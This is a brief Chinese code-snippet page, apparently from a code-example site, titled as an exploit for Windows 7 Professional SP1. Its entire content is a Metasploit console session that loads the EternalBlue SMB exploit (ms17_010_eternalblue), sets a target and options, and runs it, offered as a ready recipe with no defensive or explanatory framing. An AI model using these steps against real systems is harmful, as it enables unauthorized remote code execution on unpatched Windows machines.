📜  windows 7 专业版 7601 service pack 1 漏洞利用 - 任何代码示例

📅  最后修改于: 2022-03-11 14:57:03.661000             🧑  作者: Mango

代码示例1
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show targets
    ...targets...
msf exploit(ms17_010_eternalblue) > set TARGET < target-id >
msf exploit(ms17_010_eternalblue) > show options
    ...show and set options...
msf exploit(ms17_010_eternalblue) > exploit